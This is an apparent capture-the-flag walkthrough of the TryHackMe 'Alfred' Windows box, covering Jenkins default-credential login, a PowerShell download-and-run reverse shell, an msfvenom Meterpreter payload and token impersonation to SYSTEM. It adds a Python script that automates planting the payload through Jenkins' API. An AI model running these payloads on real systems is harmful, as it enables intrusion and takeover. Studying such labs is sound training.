TryHackMe — Alfred
Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.
Overview:
This is a Windows-based machine of easy difficulty that revolves around Jenkins. According to Wikipedia, Jenkins is an open-source automation server: it automates the parts of software development related to building, testing, and deploying, facilitating continuous integration and delivery.
This box requires some enumeration of Jenkins. It is fine if you have no earlier experience with this technology; we will go step by step. Without further ado, let's dive into the technicalities.
Enumeration:
Let's start with an nmap scan to find the open ports (-A already implies -sC and -sV, so those two flags are redundant but harmless):
nmap -sC -sV -p- -A -T4 IP_ADDRESS -oN nmap_scan.txt
Output:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2023-01-09T14:27:07+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2023-01-08T14:09:11
|_Not valid after: 2023-07-10T14:09:11
| rdp-ntlm-info:
| Target_Name: ALFRED
| NetBIOS_Domain_Name: ALFRED
| NetBIOS_Computer_Name: ALFRED
| DNS_Domain_Name: alfred
| DNS_Computer_Name: alfred
| Product_Version: 6.1.7601
|_ System_Time: 2023-01-09T14:27:03+00:00
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
From the above output, we conclude the following:
- On port 80, a Microsoft web server is running: Microsoft IIS httpd 7.5. IIS 7.5 ships with Windows 7 / Server 2008 R2, which matches the build number 6.1.7601 reported on port 3389, so the host is well out of support. The TRACE method is also enabled; that is worth recording in a report, but it does not by itself give us a foothold. Opening the site in the browser, we got the following webpage:
- On port 3389 (RDP), the rdp-ntlm-info script leaks the target name, the NetBIOS domain and computer names, the DNS names and the OS build. This information might be helpful later for framing an attack.
- On port 8080, another web server (Jetty) is running. Opening it in the browser, we got the following webpage:
Since the room is based on Jenkins, this is the starting point for further enumeration. A quick first check is the default credentials, i.e. admin:admin.
Fortunately, these credentials worked and we logged in to the application.
Now we can familiarise ourselves with the application. We are looking for any option that lets us execute commands or upload a shell.
Exploitation:
As shown in Exhibit 5, the build steps of a project include an option to execute a Windows batch command. Using this, we can get a reverse shell with Nishang's Invoke-PowerShellTcp script. First, however, we have to get the script onto the victim machine, and the victim machine does not allow direct downloads from GitHub.
To get around this, we download the script to our local machine and host it ourselves.
Next, we start a Python HTTP server on our local machine (port 9000 in the commands below) to serve the script.
The plan is to have the victim fetch the script from the attacker's machine and run it, which makes it connect back to us. Before triggering anything, start a netcat listener on the port the script will call back to (8000 below).
/* to download Invoke-PowerShellTcp.ps1 into memory and load its function */
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.16.219:9000/Invoke-PowerShellTcp.ps1')
/* to execute the loaded function (it connects back to our netcat listener) */
Invoke-PowerShellTcp -Reverse -IPAddress 10.11.16.219 -Port 8000
/* the two steps combined in a single command; this is the one to paste */
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.16.219:9000/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.11.16.219 -Port 8000
where 10.11.16.219 is the IP address of the attacker's machine, 9000 is the port of the Python server and 8000 is the port of the netcat listener. The first two lines are shown separately only for explanation: the function exists only inside the PowerShell process that loaded it, which is why the download and the call have to run in the same powershell invocation.
We copy the last command of the snippet and paste it into the “Execute Windows batch command” option as shown in Exhibit 5.
Click on “Apply” and then “Save”. After saving, we should be redirected to the following screen.
Now we are good to go, but first make sure that the Python server is up and the netcat listener is running. Click on the “Build Now” option highlighted in Exhibit 10. If the build succeeds, we get the shell shown below:
Note: You might not get the shell on the first attempt. In that case, try a few more times; if that still doesn't work, terminate the box and restart it. Remember to update the IP in the payload if your attacker IP changes.
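The build-step technique above can also be driven through Jenkins' remote API rather than the web form, which is handy when the payload has to be re-run several times (for instance when the first build does not call back). The script below is an added example for this write-up, not code from the room, from Nishang or from Jenkins. It assumes a placeholder Jenkins URL (http://10.10.10.10:8080), the admin:admin credentials and the attacker IP and ports from the page, and a made-up job name (alfred-shell). It uses only the standard library; the Python server and netcat listener still have to be started separately before create_and_build() is called.

```python
"""Drive the "Execute Windows batch command" build step through Jenkins'
remote API.  Added example for this write-up, not code from the room,
Nishang or Jenkins.  Assumptions: JENKINS is a placeholder target URL,
the credentials are the admin:admin pair from the page, ATTACKER and the
ports are the page's values, and the job name is made up."""
import base64
import json
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from http.cookiejar import CookieJar
from urllib.parse import quote

JENKINS = "http://10.10.10.10:8080"   # placeholder target URL (assumption)
AUTH = ("admin", "admin")             # default credentials that worked on the box
ATTACKER = "10.11.16.219"             # attacker IP from the write-up
HTTP_PORT, SHELL_PORT = 9000, 8000    # Python server / netcat listener ports
JOB = "alfred-shell"                  # made-up job name (assumption)


def build_payload(attacker: str, http_port: int, shell_port: int) -> str:
    """The same one-liner the write-up pastes into the batch step."""
    script = f"http://{attacker}:{http_port}/Invoke-PowerShellTcp.ps1"
    return (
        "powershell iex (New-Object Net.WebClient).DownloadString("
        f"'{script}'); Invoke-PowerShellTcp -Reverse "
        f"-IPAddress {attacker} -Port {shell_port}"
    )


def build_config_xml(command: str) -> bytes:
    """Minimal freestyle-job config.xml whose only builder is a
    hudson.tasks.BatchFile step (what the UI stores for "Execute Windows
    batch command").  ElementTree escapes &, < and > in the command."""
    project = ET.Element("project")
    builders = ET.SubElement(project, "builders")
    step = ET.SubElement(builders, "hudson.tasks.BatchFile")
    ET.SubElement(step, "command").text = command
    return ET.tostring(project, encoding="utf-8")


def parse_batch_command(config_xml: bytes) -> str:
    """Inverse of build_config_xml: pull the batch command out of a job's
    config.xml (useful when auditing existing jobs for planted steps)."""
    node = ET.fromstring(config_xml).find("./builders/hudson.tasks.BatchFile/command")
    return node.text if node is not None and node.text else ""


def make_opener() -> urllib.request.OpenerDirector:
    """HTTP client with basic auth and a cookie jar (recent Jenkins
    versions tie the CSRF crumb to the session cookie)."""
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar()))
    token = base64.b64encode(f"{AUTH[0]}:{AUTH[1]}".encode()).decode()
    opener.addheaders = [("Authorization", f"Basic {token}")]
    return opener


def crumb_headers(opener) -> dict:
    """Jenkins rejects state-changing POSTs without a CSRF crumb; a 404
    from the crumb issuer means CSRF protection is switched off."""
    try:
        with opener.open(f"{JENKINS}/crumbIssuer/api/json") as resp:
            data = json.load(resp)
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return {}
        raise
    return {data["crumbRequestField"]: data["crumb"]}


def post(opener, url: str, body: bytes = b"", headers: dict = None) -> int:
    """POST and return the HTTP status; 4xx is returned as a status rather
    than raised so the caller decides what is acceptable."""
    req = urllib.request.Request(url, data=body, method="POST")
    for key, value in (headers or {}).items():
        req.add_header(key, value)
    try:
        with opener.open(req) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def create_and_build(command: str) -> int:
    """Create the job (or overwrite its config if it already exists) and
    queue a build.  Returns the status of the build request; 201 means
    queued.  Start the HTTP server and netcat listener before calling."""
    opener = make_opener()
    crumb = crumb_headers(opener)
    xml_headers = {**crumb, "Content-Type": "application/xml"}
    status = post(opener, f"{JENKINS}/createItem?name={quote(JOB)}",
                  build_config_xml(command), xml_headers)
    if status == 400:                 # a job with that name already exists
        status = post(opener, f"{JENKINS}/job/{quote(JOB)}/config.xml",
                      build_config_xml(command), xml_headers)
    if status != 200:
        raise RuntimeError(f"job creation returned HTTP {status}")
    return post(opener, f"{JENKINS}/job/{quote(JOB)}/build", headers=crumb)


if __name__ == "__main__":
    print(create_and_build(build_payload(ATTACKER, HTTP_PORT, SHELL_PORT)))
```

build_config_xml produces the same hudson.tasks.BatchFile step that Jenkins saves when you add an “Execute Windows batch command” step in the UI, so the resulting job is indistinguishable from one created by hand; parse_batch_command is the reverse operation and is just as useful on the defensive side for sweeping existing jobs for planted commands.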
We can explore the machine and get the user.txt flag.
Post Exploitation:
Now we need to escalate our privileges to get the root.txt flag. To do that, we upgrade our existing shell to a Meterpreter session, which provides more capabilities than the plain shell (in particular the token manipulation and process migration we need below). We will do that in the following three steps:
- Generating a payload.
- Transferring the payload into the victim machine.
- Triggering the payload.
Generating a payload:
Generating a payload using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.16.219 LPORT=4444 -f exe -o reverse_shell.exe
Transferring the payload into the victim machine:
We transfer the payload to the victim machine by pasting the following command into the shell we got in Exhibit 11. The Python server from earlier is still serving our working directory over plain HTTP on port 9000, so drop reverse_shell.exe there first:
powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.11.16.219:9000/reverse_shell.exe', 'reverse_shell.exe')"
Triggering the payload:
Before executing the payload, we need to set up a listener in Metasploit using exploit/multi/handler, with the payload, LHOST and LPORT matching the msfvenom command above (windows/meterpreter/reverse_tcp, 10.11.16.219 and 4444).
After setting the required options, run it to start the listener.
Now we execute the payload on the victim machine from the shell we already have.
We can see that we got the Meterpreter shell with the same privileges as the previous shell, i.e. the user bruce, so we need to look for ways to escalate our privileges. In our previous shell, check which privileges the token holds and which of them are enabled.
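The privilege check is the step that decides which escalation route is open, so it is worth doing systematically. The script below is an added example for this write-up, not the room's material: it parses the output of whoami /priv (what you run in the bruce shell) and flags the privileges that have a well-known path to SYSTEM, including the one used next. The sample output is constructed to resemble the box's, not a capture from it.

```python
"""Triage `whoami /priv` output for privileges that are known escalation
primitives.  Added example for this write-up, not the room's material.
The sample below is constructed to resemble the bruce shell's output; it
is not a capture from the box."""

# Constructed sample of `whoami /priv` output (not captured from the box).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges with a well-known route to SYSTEM and what they let you do.
ABUSABLE = {
    "SeImpersonatePrivilege": "impersonate a SYSTEM/Administrators token (incognito, potato family)",
    "SeAssignPrimaryTokenPrivilege": "start a process with a SYSTEM primary token",
    "SeDebugPrivilege": "open and inject into SYSTEM processes",
    "SeBackupPrivilege": "read any file regardless of its ACL (SAM and SYSTEM hives)",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load a kernel driver",
}


def parse_whoami_priv(text: str) -> dict:
    """Map privilege name -> True if Enabled, False if Disabled.

    whoami /priv lists every privilege the token holds.  A "Disabled"
    entry is still held (the process can switch it on itself), so
    held-but-disabled privileges count for triage."""
    privs = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("====="):   # separator under the column headers
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        name, state = parts[0], parts[-1]
        privs[name] = state.lower() == "enabled"
    return privs


def abusable_privs(privs: dict) -> list:
    """Return (name, enabled, note) for each held privilege in ABUSABLE."""
    return [(name, privs[name], ABUSABLE[name]) for name in ABUSABLE if name in privs]


def triage(text: str) -> str:
    """Human-readable summary of the escalation options in the output."""
    hits = abusable_privs(parse_whoami_priv(text))
    if not hits:
        return "no abusable privileges held"
    return "\n".join(
        f"{name} ({'enabled' if enabled else 'held, disabled'}): {note}"
        for name, enabled, note in hits
    )


if __name__ == "__main__":
    print(triage(SAMPLE_WHOAMI_PRIV))
```

On the sample the only hit is SeImpersonatePrivilege, which is exactly the route the write-up takes next; on a real engagement the held-but-disabled entries matter too, since a process can enable a privilege it already holds without any further access.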
We will take advantage of SeImpersonatePrivilege to escalate privileges. With it, Meterpreter's incognito extension can list the tokens present on the box and impersonate one; we impersonate the “BUILTIN\Administrators” token to get its privileges.
Even after obtaining “NT AUTHORITY\SYSTEM”, we are unable to read the root.txt file. This is because we are only holding an impersonation token, and Windows decides what a process can or cannot do from the primary token of the process. To read the root flag, we migrate into a process that already runs as SYSTEM, so that our Meterpreter inherits that primary token.
We migrate into services.exe, which has process ID 668 on this box (check the process list, as the PID changes between boots).
We have successfully migrated into that process and can now read the root.txt file.
Finally, we got the root flag.